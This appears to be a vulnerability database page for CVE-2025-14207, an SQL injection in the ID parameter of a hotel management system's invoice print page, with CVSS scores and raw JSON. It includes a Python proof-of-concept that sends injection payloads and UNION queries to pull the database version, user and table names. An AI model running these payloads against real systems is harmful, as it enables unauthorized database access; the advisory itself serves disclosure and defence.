Security Vulnerability Report
中文
CVE-2025-14207 CVSS 7.3 HIGH

CVE-2025-14207

Published: 2025-12-08 01:16:00
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was identified in tushar-2223 Hotel-Management-System up to bb1f3b3666124b888f1e4bcf51b6fba9fbb01d15. The impacted element is an unknown function of the file /admin/invoiceprint.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Hotel-Management-System (tushar-2223) < bb1f3b3666124b888f1e4bcf51b6fba9fbb01d15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-14207 SQL Injection PoC # Hotel-Management-System /admin/invoiceprint.php # CVSS: 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L import requests import sys TARGET_URL = "http://target.com/admin/invoiceprint.php" def test_sql_injection(): """Test for SQL injection vulnerability in ID parameter""" # Basic SQL injection test payloads payloads = [ "1' OR '1'='1", "1' UNION SELECT 1,2,3,4,5,6-- -", "1' AND SLEEP(5)-- -", "1' OR 1=1 LIMIT 1-- -" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } print(f"[*] Testing CVE-2025-14207 SQL Injection") print(f"[*] Target: {TARGET_URL}") for payload in payloads: try: params = {"id": payload} response = requests.get( TARGET_URL, params=params, headers=headers, timeout=10, verify=False ) print(f"\n[*] Payload: {payload}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") # Check for SQL error messages sql_errors = [ "mysql_fetch", "mysqli_fetch", "SQL syntax", "Warning", "mysql_num_rows" ] for error in sql_errors: if error.lower() in response.text.lower(): print(f"[!] Potential SQL error detected: {error}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") def extract_database_info(): """Extract database information using UNION-based injection""" # UNION-based injection to get database info info_payloads = { "version": "1' UNION SELECT 1,@@version,3,4,5,6-- -", "database": "1' UNION SELECT 1,database(),3,4,5,6-- -", "user": "1' UNION SELECT 1,user(),3,4,5,6-- -", "tables": "1' UNION SELECT 1,group_concat(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database()-- -" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } print("\n[*] Extracting database information...") for info_type, payload in info_payloads.items(): try: params = {"id": payload} response = requests.get( TARGET_URL, params=params, headers=headers, timeout=10, verify=False ) print(f"\n[*] {info_type.upper()}:") print(f"[*] Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Failed to extract {info_type}: {e}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] test_sql_injection() response = input("\n[*] Do you want to extract database information? (y/n): ") if response.lower() == 'y': extract_database_info()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14207", "sourceIdentifier": "[email protected]", "published": "2025-12-08T01:16:00.473", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in tushar-2223 Hotel-Management-System up to bb1f3b3666124b888f1e4bcf51b6fba9fbb01d15. The impacted element is an unknown function of the file /admin/invoiceprint.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/yaklang/IRifyScanResult/blob/main/Hotel-Management-System/SQL_Injection_Vulnerability_Report.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.334650", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334650", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.700478", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.